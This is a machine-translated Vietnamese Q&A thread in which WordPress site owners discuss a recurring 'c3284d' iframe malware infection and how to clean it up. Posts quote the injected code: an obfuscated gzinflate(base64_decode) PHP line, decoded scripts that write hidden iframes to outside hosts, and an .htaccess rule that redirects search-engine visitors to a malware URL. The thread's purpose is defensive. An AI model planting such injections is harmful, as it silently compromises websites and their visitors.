1. Trang chủ
  2. Câu hỏi và trả lời
  3. Tấn công iframe trang web - chèn mã vào nguồn

Tấn công iframe trang web - chèn mã vào nguồn

2012-07-11 42 views
6

Trong vài ngày qua, trang web của tôi đã nhiều lần là mục tiêu của cuộc tấn công iframe. Mã được nối chủ yếu vào các trang PHP và Javascript. Mã này là sau đó PHP căn cứ 64 mã hóa, xem ví dụ (Tôi đã thay đổi mã một chút để trung hòa nó):Tấn công iframe trang web - chèn mã vào nguồn

#c3284d# 
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); 
#/c3284d#

được giải mã này trông giống như sau:

<script type="text/javascript"> 
    document.write(
     '<iframe src="http://opticmoxie.com/xxxxxxx.php"  
     name="Twitter" scrolling="auto" frameborder="no" 
     align="center" height="2" width="2"></iframe>' 
    );

Các một điểm chung là tất cả các mã đều có chú thích "# c3284d #" nên việc theo dõi mã độc không khó. Nhưng nó là tốn thời gian ...

Chúng tôi đang ở trên một máy chủ được chia sẻ tại Gradwell (Anh) và chúng không đặc biệt hữu ích. Vì vậy, câu hỏi là tôi có thể làm gì để ngăn chặn vấn đề này lặp lại chính nó? Tôi biết các cuộc tấn công MySQL Injection và sử dụng mysql_real_escape_string của PHP để bảo vệ chống lại các cuộc tấn công như vậy.

Trang web là ổ đĩa PHP và MySQL. Chúng tôi sử dụng MySQLFTP và có tài khoản shell để truy cập SSH. Chúng tôi sử dụng Wordpress (cập nhật mới nhất với các plugin không kích hoạt).

Nguồn

2012-07-11 monkey64

+1

Có rất nhiều câu chuyện về PHP tồn tại về loại câu hỏi này và tôi khuyến khích bạn tìm kiếm câu hỏi đó. Tuy nhiên, câu trả lời suy nghĩ bên cho câu hỏi này là "[sử dụng một cái gì đó khác với PHP.] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP dễ bị các vấn đề bảo mật hơn –

+1

Một câu hỏi cũ, nhưng vẫn đáng làm cho điểm này: có được một máy quét băm và cài đặt nó trong tài khoản của bạn. Có khá ít trong PHP, từ những gì tôi có thể nói. Các cron này sử dụng để kiểm tra xem tệp nào mới hoặc đã thay đổi và có thể gửi email cho bạn nếu tìm thấy các thay đổi đáng ngờ. – halfer

Trả lời

0

Tôi cũng có cùng một vấn đề. Trong trường hợp của tôi mã nối là

<!--c3284d--><script type="text/javascript"> 
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); 
</script><!--/c3284d-->

Bên cạnh đó, có một tập tin .htaccess như sau:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} 
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) 
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php 
> [R=301,L] </IfModule> 
> #/c3284d#

tôi thấy hai bài viết về vấn đề này: http://www.webmasterworld.com/html/4472821.htmhttp://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hope nó giúp

Nguồn

2012-07-11 17:56:33 Thang

+1

Ngay sau khi viết bài đăng này, tôi lại bị phần mềm độc hại tấn công lần nữa. Tuy nhiên kể từ khi thay đổi mật khẩu FTP, SSH và MySQL của tôi, tôi không có thêm bất kỳ vấn đề nào. Tôi đồng ý với bài báo đó. Shared Hosting chỉ gây ra vấn đề. Bây giờ đã mở một tài khoản Virtual Private Server. – monkey64

1

Tôi gặp vấn đề tương tự. Nhật ký truy cập của máy chủ FTP cho thấy rằng các sửa đổi đã được thực hiện bằng mật khẩu FTP bị tấn công.

Nguồn

2012-07-14 17:46:28 abaumg

1

Tôi có cùng sự cố và biến thể của các tệp bị tấn công khác nhau trên nhiều miền khác nhau. Một điều phổ biến tôi nhận thấy là Wordpress. Chúng tôi có wordpress trên nhiều máy chủ và tôi nghĩ rằng đó là thủ phạm phổ biến. Tôi đã cập nhật tất cả các tài khoản wordpress của mình, đã thay đổi tất cả các từ khóa cho tất cả các tài khoản miền. không chắc chắn nếu vấn đề là hoàn toàn giải quyết được nêu ra.

Nguồn

2012-07-19 22:07:19 Larry

1

Tôi đã gặp sự cố tương tự nhưng vào một trang Wordpress.

Tôi đoán trang web đã bị nhiễm thông qua các tiện ích, vì tôi sử dụng một plugin cho phép mã PHP được thực hiện.

giải pháp tốt nhất của tôi là:

  • loại bỏ widget đáng ngờ;
  • xem thời gian và ngày của một tệp bị nhiễm (trường hợp của tôi: header.php);
  • xóa tất cả các tệp bị nhiễm (trong trường hợp của tôi, tôi có bản sao lưu của trang web);
  • tìm kiếm trong tệp nhật ký cho các IP đáng ngờ tại thời điểm đó (tìm kiếm các IP trên danh sách đen);
  • cài đặt một plugin để cấm các IP đáng ngờ.

Từ thời điểm đó sự cố đã biến mất. Tôi hy vọng điều này sẽ giúp bạn.

Nguồn

2012-07-27 14:36:48 Mario

1

Có cùng sự cố trên tất cả các trang Wordpress mà tôi quản trị. Didnt tìm nguồn gốc của nhiễm trùng, tôi đặt cược rằng một số sâu của nó trên máy tính của tôi hoặc nó `s một số Plugin mà tôi cài đặt trên tất cả các trang web.

Tôi tìm thấy tất cả các tệp đã được sửa đổi trong nhật ký plugin bảo mật WP-Better và xóa mã bị nhiễm bổ sung và sau khi tôi đã thực hiện chmod 444 trên tất cả các tệp là nguồn lây nhiễm.

Bây giờ, miễn phí kể từ 1 tháng iframe/htacess ác và các nội dung khác.

Nguồn

2012-12-21 21:45:35 Lukas

1

Tôi đã gặp sự cố tương tự và nhận thấy rằng phương thức mà họ sử dụng để truy cập là mật khẩu ftp bị tấn công.

Mặc dù điều này đang chạy trên máy chủ cPanel với tính năng bảo vệ lực lượng CPHulk được kích hoạt, tôi thấy rằng các tin tặc đã cố gắng tìm cách tấn công hàng ngàn máy chủ bị xâm nhập khác nhau.

May là tôi đã có nhật ký của tất cả các tệp đã được tải lên nên tôi đã viết một tập lệnh để khôi phục các tệp này từ bản sao lưu.

Sau đó, tôi tăng mức độ bảo vệ sức mạnh vũ phu cPanel bằng cách giảm số lần thử không thành công được yêu cầu trước khi tài khoản bị khóa.

Nguồn

2013-02-14 00:47:48 Rabbie

-1

Những kẻ xấu có quyền truy cập vào mã của bạn, vì vậy bạn phải đóng quyền truy cập của họ, trong khi chờ đợi, bạn có thể sử dụng tập lệnh đơn giản để kiểm tra và xóa tất cả các dòng phát hiện gzinflate (base64_decode). với các tệp sao lưu) sẽ vô ích nếu họ vẫn có quyền truy cập

Nguồn

2014-12-12 16:35:02 Nemesis

Các vấn đề liên quan

 Các vấn đề liên quan